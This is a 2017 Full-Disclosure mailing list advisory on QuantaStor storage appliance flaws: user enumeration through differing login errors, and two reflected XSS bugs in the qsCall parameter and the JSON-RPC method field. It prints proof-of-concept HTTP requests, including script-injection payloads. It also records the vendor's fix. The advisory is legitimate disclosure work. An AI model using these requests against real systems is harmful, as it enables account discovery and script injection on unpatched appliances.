lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8fd76948741df844b4a149437439e305@vvvsecurity.com>
Date: Sat, 12 Aug 2017 12:32:09 -0400
From: advisories@...security.com
To: fulldisclosure@...lists.org
Subject: [FD] QuantaStor Software Define Storage mmultiple vulnerabilities

1. --- Advisory details ---

Title: QuantaStor Software Define Storage mmultiple vulnerabilities

Advisory ID: VVVSEC-2017-6943

Advisory URL: 
http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt

Date published: 12/08/2017

CVEs:
      CVE-2017-9978 "Brute force login request using http post mechanism 
returns different errors",
      CVE-2017-9979 "Rest call made for methods not implemented in the 
server return a response with the invalid method previously invoked."

CVSS v3.0 score:
      CVE-2017-9978 5.3 MEDIUM 
(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
      CVE-2017-9979 6.1 MEDIUM 
(CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

2. --- Vulnerability details ---

Class:
	CWE-79: Improper Neutralization of Input During Web Page Generation 
('Cross-site Scripting')
	CWE-203: Information Exposure Through Discrepancy

Impact: Information disclosure

Remotely Exploitable: Yes
Locally Exploitable: No

3. --- Vulnerability Description ---

	OSNEXUS QuantaStor [1] Software Define Storage appliance was designed 
to ease the process of storage management.
	From vendor's website "...QuantaStor SDS, deployed in datacenters 
worldwide, addresses a broad set of storage use
	cases including server virtualization, big data, cloud computing, and 
high performance applications
	through scale-out physical and virtual storage appliances..."

	Three different vulnerabilities were found in the appliance. A user 
enumeration attack and two unauthenticated XSS.
	These vulnerabilities could allow a remote attacker to obtain valid 
usernames to perform bruteforce attacks and
	obtain sensitive information.


4. --- Affected software versions ---

               OSNEXUS QuantaStor v4 virtual appliance

5. --- Technical description ---

	5.1 --- User enumeration ---

		QuantaStor login mechanism returns different messages if the account 
used to perform the login is valid or not in the system.
		Leveraging this difference an attacker could be able to enumerate 
valid accounts.

	5.1.1 --- Proof of Concept ---

		Executing the following HTTP requests an attacker can perform a login 
request.

		"""

		POST / HTTP/1.0
		Content-Type: text/xml; charset=utf-8
		Accept: application/soap+xml, application/dime, multipart/related, 
text/*
		User-Agent: Axis/1.4
		Host: localhost:5152
		Cache-Control: no-cache
		Pragma: no-cache
		SOAPAction: ""
		Authorization: Basic <REPLACE WITH BASE64 Encoded credentials>
		Content-Length: 384


		<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope 
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
		<soapenv:Body>
		<objectGet 
xmlns="http://quantastor.osnexus.com/webservices/osn.xsd"><reserved 
xmlns="">
		</reserved></auditLogGet></soapenv:Body></soapenv:Envelope>

		"""

		If the user included in the request is valid, the error returned by 
the application will be:

			<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Server</faultcode><faultstring>&lt;fault&gt;Authentication 
check failed for 'admin',
			please verify your password was entered correctly. (10.10.0.1) 
[err=26]
			&lt;/fault&gt;</faultstring><detail><detail><msg>Authentication check 
failed for 'admin', please verify your password was entered correctly. 
(10.10.0.1)
			[err=26]</msg><loc>service/osn_security_manager.cpp:1298</loc></detail></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>

		But if the user doesn't exist in the system, the message will be:

			<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>SOAP-ENV:Server</faultcode><faultstring>&lt;fault&gt;Authentication 
failed, please
			verify your username, 'TESTUSER' is invalid. (10.10.0.1) 
[err=26]&lt;/fault&gt;</faultstring><detail><detail><msg>
			Authentication failed, please verify your username, 'TESTUSER' is 
invalid. (10.10.0.1) [err=26]
			</msg><loc>service/osn_security_manager.cpp:1256</loc></detail></detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>

	5.2 --- Cross Site Scripting in "qsCall" parameter

		QuantaStor API accepts parameters through the use of the "qsCall" 
parameter. If the method called
		doesn't exist an error will be triggered containing the invalid method 
previously invoked.
		The response sent to the user isn't sanitized.
		An attacker can leverage this issue including arbitrary HTML or 
JavaScript code in the qsCall parameter.

	5.2.2 --- Proof of Concept ---

		Execute the following HTTP request.

		"""
		https://<HOST>:8153/qstorapi?qsCall=%3Cscript%3Ealert(1)%3C/script%3E
		"""

	5.3 --- Cross Site Scripting in "/qstorapi/jsonrpc"

		QuantaStor "jsonrpc "API accepts parameters through the use of a JSON 
dictionary. If the method called
		doesn't exist an error will be triggered containing the invalid method 
previously invoked.
		The response sent to the user isn't sanitized.
		An attacker can leverage this issue including arbitrary HTML or 
JavaScript code in the "method" key.

	5.3.1 --- Proof of Concept ---

		Execute the following HTTP request.

		"""
		POST /qstorapi/jsonrpc HTTP/1.0

		Accept: application/soap+xml, application/dime, multipart/related, 
text/*
		User-Agent: Axis/1.4
		Host: <HOST>:8153
		Cache-Control: no-cache
		Pragma: no-cache
		Content-Type: application/json
		Content-Length: 54


		{"method":"<script>alert(1)</script>", "params":"asd"}
		"""


6. --- Vendor information ---

         OSNEXUS released Quantastor version 4.3.1 fixing CVE-2017-9978 
and CVE-2017-9979

7. --- Credits ---

	These vulnerabilities were discovered by Nahuel D. Sanchez, VVVSecurity

8. --- Report timeline ---

	25/06/2017 -- VVVSecurity sent Advisory to OSNEXUS
	29/06/2017 -- OSNEXUS confirmed the security vulnerabilities, 
CVE-2017-9978 and CVE-2017-9979 were provided.
	24/07/2017 -- OSNEXUS released QuantaStor version 4.3.1
	12/08/2017 -- Security Advisory published

9. --- References ---

	[1] https://www.osnexus.com/software-defined-storage/

10. --- Copyright ---

	The contents of this advisory are copyright (c) 2017 VVVSecurity and 
are licensed
	under a Creative Commons Attribution Non-Commercial Share-Alike 4.0
	License: http://creativecommons.org/licenses/by-nc-sa/4.0/ 
<http://creativecommons.org/licenses/by-nc-sa/4.0/>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ